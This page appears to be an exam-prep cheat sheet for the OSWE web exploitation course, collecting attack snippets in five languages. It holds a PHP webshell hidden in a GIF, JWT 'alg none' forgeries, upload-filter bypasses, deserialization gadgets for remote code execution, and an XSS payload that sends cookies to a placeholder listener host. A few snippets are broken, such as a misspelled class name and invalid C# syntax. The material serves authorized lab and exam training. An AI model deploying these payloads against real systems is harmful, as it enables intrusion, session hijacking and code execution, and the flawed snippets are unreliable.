Helpers

OSWE Helper Scripts & Functions Cheat Sheet

A grab‑bag of reusable helpers for Java, C#, PHP, Python, and Node.js to accelerate exploit development during OSWE. Copy/paste into your PoCs or upload into target apps when white‑box routes are available.

1) Hashing & Encoding (multi‑lang)

Python

import hashlib, base64

# MD5 / SHA1 / SHA256
print('MD5:', hashlib.md5(b'password').hexdigest())
print('SHA1:', hashlib.sha1(b'password').hexdigest())
print('SHA256:', hashlib.sha256(b'password').hexdigest())

# Base64 (std + urlsafe)
raw = b'payload'
enc = base64.b64encode(raw).decode()
urlenc = base64.urlsafe_b64encode(raw).decode().rstrip('=')
print('b64:', enc)
print('b64url:', urlenc)
print('dec:', base64.b64decode(enc).decode())

PHP

<?php
$md5 = md5('password');
$sha1 = sha1('password');
$sha256 = hash('sha256', 'password');
$enc = base64_encode('payload');
$dec = base64_decode($enc);
echo "$md5\n$sha1\n$sha256\n$enc\n$dec\n";
?>

Java

import java.security.MessageDigest;
import java.util.Base64;

byte[] data = "password".getBytes();
MessageDigest md = MessageDigest.getInstance("MD5");
System.out.println(javax.xml.bind.DatatypeConverter.printHexBinary(md.digest(data)));
MessageDigest sha = MessageDigest.getInstance("SHA-256");
System.out.println(javax.xml.bind.DatatypeConverter.printHexBinary(sha.digest(data)));

String enc = Base64.getEncoder().encodeToString("payload".getBytes());
String dec = new String(Base64.getDecoder().decode(enc));
System.out.println(enc + "\n" + dec);

C# (.NET)

using System; using System.Security.Cryptography; using System.Text;
byte[] data = Encoding.UTF8.GetBytes("password");
Console.WriteLine(BitConverter.ToString(MD5.Create().ComputeHash(data)).Replace("-",""));
Console.WriteLine(BitConverter.ToString(SHA256.Create().ComputeHash(data)).Replace("-",""));
string enc = Convert.ToBase64String(Encoding.UTF8.GetBytes("payload"));
string dec = Encoding.UTF8.GetString(Convert.FromBase64String(enc));
Console.WriteLine(enc + "\n" + dec);

Node.js

const crypto = require('crypto');
console.log('md5:', crypto.createHash('md5').update('password').digest('hex'));
console.log('sha256:', crypto.createHash('sha256').update('password').digest('hex'));
const enc = Buffer.from('payload').toString('base64');
const dec = Buffer.from(enc, 'base64').toString();
console.log(enc, dec);

2) JWT Manipulation (decode/forge)

Note: modern libs may block alg: none; manual forging still useful to test vulnerable implementations.

Python (manual decode/forge)

import base64, json

def b64url_decode(s):
    s += '=' * (-len(s) % 4)
    return base64.urlsafe_b64decode(s)

def b64url_encode(b):
    return base64.urlsafe_b64encode(b).decode().rstrip('=')

def jwt_decode(token):
    h,p,s = token.split('.')
    return json.loads(b64url_decode(p))

# Forge with alg none
header = b'{"alg":"none","typ":"JWT"}'
payload = b'{"user":"admin","admin":true}'
fake = b64url_encode(header) + '.' + b64url_encode(payload) + '.'
print('FORGED:', fake)

Node.js (modify payload, keep header)

const forgeNone = (jwt) => {
  const [h, p] = jwt.split('.');
  const payload = JSON.parse(Buffer.from(p, 'base64').toString());
  payload.admin = true;
  const newP = Buffer.from(JSON.stringify(payload)).toString('base64').replace(/=+$/,'');
  return `${h}.${newP}.`;
};

Python (sign HS256 with known/guessable secret)

import hmac, hashlib, base64, json

def sign_hs256(header, payload, secret):
    def b64e(x): return base64.urlsafe_b64encode(x).decode().rstrip('=')
    h = b64e(json.dumps(header).encode())
    p = b64e(json.dumps(payload).encode())
    sig = hmac.new(secret.encode(), msg=f"{h}.{p}".encode(), digestmod=hashlib.sha256).digest()
    return f"{h}.{p}.{b64e(sig)}"
print(sign_hs256({"alg":"HS256","typ":"JWT"},{"uid":1},"secret"))

3) Symmetric Crypto Abuse (AES ECB/CTR)

Python (PyCryptodome)

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
key = b'0123456789abcdef'
pt = b'attack at dawn'
# ECB — block aligned => pattern leaks
c = AES.new(key, AES.MODE_ECB)
ct = c.encrypt(pad(pt, 16))
print(ct.hex())
print(unpad(AES.new(key, AES.MODE_ECB).decrypt(ct), 16))
# CTR — bit‑flipping demo
from Crypto.Util import Counter
ctr = Counter.new(128, initial_value=0)
ct2 = AES.new(key, AES.MODE_CTR, counter=ctr).encrypt(pt)

PHP (openssl)

<?php
$key = "0123456789abcdef"; $pt = "attack at dawn";
$ct = openssl_encrypt($pt, 'aes-128-ecb', $key, OPENSSL_RAW_DATA);
$dec = openssl_decrypt($ct, 'aes-128-ecb', $key, OPENSSL_RAW_DATA);
echo bin2hex($ct)."\n".$dec; 
?>

C# (ECB)

using System; using System.Security.Cryptography; using System.Text;
var key = Encoding.UTF8.GetBytes("0123456789abcdef");
using var aes = Aes.Create(); aes.Key = key; aes.Mode = CipherMode.ECB; aes.Padding = PaddingMode.PKCS7;
var enc = aes.CreateEncryptor(); var ct = enc.TransformFinalBlock(Encoding.UTF8.GetBytes("attack at dawn"),0,14);
Console.WriteLine(BitConverter.ToString(ct).Replace("-",""));

4) File Upload Tricks

MIME spoofing via curl

curl -F "[email protected];type=image/jpeg" -F "submit=Upload" http://TARGET/upload

PHP polyglot GIF

printf "GIF89a\n<?php echo shell_exec($_GET['cmd']); ?>" > shell.gif

Double extension bypass

mv shell.php shell.php.jpg
curl -F "[email protected]" http://TARGET/upload

Node.js server‑side content‑type trust

// If the app trusts client Content-Type, you can send image/jpeg with PHP code

5) Auth Bypass Helpers

Timestamp‑based token (replicate server logic)

import hashlib, time
now = int(time.time())
print(hashlib.md5(str(now).encode()).hexdigest())

Java predictable PRNG

import java.util.Random;
Random r = new Random(12345); // seed guessed from server time
System.out.println(r.nextInt());

C# weak reset code

int code = (int)(DateTimeOffset.UtcNow.ToUnixTimeSeconds() % 1000);
Console.WriteLine(code.ToString("000"));

Python HMAC token (if key leaked)

import hmac, hashlib
print(hmac.new(b'secret', b'user=admin', hashlib.sha1).hexdigest())

6) (De)Serialization Payloads

PHP __destruct gadget

<?php
class Evil { function __destruct(){ system('id'); } }
echo serialize(new Evil());
?>

Python Pickle reduce RCE

import pickle
class Evil:
    def __reduce__(self):
        import os
        return (os.system, ('id',))
print(pickle.dumps(Eevil()))

Java Serializable gadget (custom class)

import java.io.*;
public class Evil implements Serializable {
  private void readObject(ObjectInputStream in) throws Exception {
    in.defaultReadObject();
    Runtime.getRuntime().exec("calc"); // replace cmd
  }
}

Node.js (node-serialize)

// payload for vulnerable eval/deserialize sinks
var payload = '{"rce":"_$$ND_FUNC$$_function(){require("child_process").exec("id",console.log)}()"}';

7) Command Execution Wrappers

Python

import subprocess
out = subprocess.check_output(['id']).decode()
print(out)

PHP

<?php echo shell_exec('id'); ?>

Java

Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","id"});

Node.js

require('child_process').exec('id', (e,out)=>console.log(out));

C#

using System.Diagnostics;
Process.Start(new ProcessStartInfo{"FileName"="cmd.exe","Arguments"="/c whoami","UseShellExecute"=false});

8) Misc Utilities

URL encode/decode (Python)

import urllib.parse
print(urllib.parse.quote("a b/c?d=e"))
print(urllib.parse.unquote("a%20b%2Fc%3Fd%3De"))

Base64url helpers (PHP)

<?php
function b64url_encode($d){ return rtrim(strtr(base64_encode($d), '+/', '-_'), '='); }
function b64url_decode($d){ return base64_decode(strtr($d, '-_', '+/') . str_repeat('=', (4 - strlen($d)%4)%4)); }
?>

Random string (Python)

import secrets, string
print(''.join(secrets.choice(string.ascii_letters+string.digits) for _ in range(16)))

Padding XOR helper (Python)

def xor_bytes(a,b): return bytes(x^y for x,y in zip(a,b))

9) Drop‑in PoC Helpers (requests wrapper)

Python HTTP client with evidence capture

import requests, os
S = requests.Session()
S.headers.update({'User-Agent':'OSWE-POC'})

def req(method, url, **kw):
    r = S.request(method, url, timeout=8, **kw)
    os.makedirs('evidence', exist_ok=True)
    with open(os.path.join('evidence', f"{method}_{url.replace('/','_')[:60]}.txt"),'wb') as f:
        f.write(f"STATUS {r.status_code}\n\n".encode()+r.content[:4096])
    return r

const fetch = require('node-fetch');
async function GET(u, cookie){
  const r = await fetch(u, {headers:{'Cookie':cookie,'User-Agent':'OSWE-POC'}});
  const t = await r.text();
  require('fs').writeFileSync('evidence.txt', t.slice(0,4096));
  return t;
}

10) WebSocket helper (Python)

import websocket
websocket.enableTrace(False)
ws = websocket.WebSocket();
ws.connect('ws://HOST:PORT/ws?token=XYZ');
ws.send('<img src=x onerror="fetch(\'http://LISTENER/?c=\'+document.cookie)">');
ws.close();

Use responsibly and only in authorized environments (OSWE exam / lab).

PreviousRegEx NextDebugging

Last updated 1 month ago

hashtagOSWE Helper Scripts & Functions Cheat Sheet

hashtag1) Hashing & Encoding (multi‑lang)

hashtagPython

hashtagPHP

hashtagJava

hashtagC# (.NET)

hashtagNode.js

hashtag2) JWT Manipulation (decode/forge)

hashtagPython (manual decode/forge)

hashtagNode.js (modify payload, keep header)

hashtagPython (sign HS256 with known/guessable secret)

hashtag3) Symmetric Crypto Abuse (AES ECB/CTR)

hashtagPython (PyCryptodome)

hashtagPHP (openssl)

hashtagC# (ECB)

hashtag4) File Upload Tricks

hashtagMIME spoofing via curl

hashtagPHP polyglot GIF

hashtagDouble extension bypass

hashtagNode.js server‑side content‑type trust

hashtag5) Auth Bypass Helpers

hashtagTimestamp‑based token (replicate server logic)

hashtagJava predictable PRNG

hashtagC# weak reset code

hashtagPython HMAC token (if key leaked)

hashtag6) (De)Serialization Payloads

hashtagPHP __destruct gadget

hashtagPython Pickle reduce RCE

hashtagJava Serializable gadget (custom class)

hashtagNode.js (node-serialize)

hashtag7) Command Execution Wrappers

hashtagPython

hashtagPHP

hashtagJava

hashtagNode.js

hashtagC#

hashtag8) Misc Utilities

hashtagURL encode/decode (Python)

hashtagBase64url helpers (PHP)

hashtagRandom string (Python)

hashtagPadding XOR helper (Python)

hashtag9) Drop‑in PoC Helpers (requests wrapper)

hashtagPython HTTP client with evidence capture

hashtagNode.js fetch with cookie injection

hashtag10) WebSocket helper (Python)

OSWE Helper Scripts & Functions Cheat Sheet

1) Hashing & Encoding (multi‑lang)

Python

PHP

Java

C# (.NET)

Node.js

2) JWT Manipulation (decode/forge)

Python (manual decode/forge)

Node.js (modify payload, keep header)

Python (sign HS256 with known/guessable secret)

3) Symmetric Crypto Abuse (AES ECB/CTR)

Python (PyCryptodome)

PHP (openssl)

C# (ECB)

4) File Upload Tricks

MIME spoofing via curl

PHP polyglot GIF

Double extension bypass

Node.js server‑side content‑type trust

5) Auth Bypass Helpers

Timestamp‑based token (replicate server logic)

Java predictable PRNG

C# weak reset code

Python HMAC token (if key leaked)

6) (De)Serialization Payloads

PHP __destruct gadget

Python Pickle reduce RCE

Java Serializable gadget (custom class)

Node.js (node-serialize)

7) Command Execution Wrappers

Python

PHP

Java

Node.js

C#

8) Misc Utilities

URL encode/decode (Python)

Base64url helpers (PHP)

Random string (Python)

Padding XOR helper (Python)

9) Drop‑in PoC Helpers (requests wrapper)

Python HTTP client with evidence capture

Node.js fetch with cookie injection

10) WebSocket helper (Python)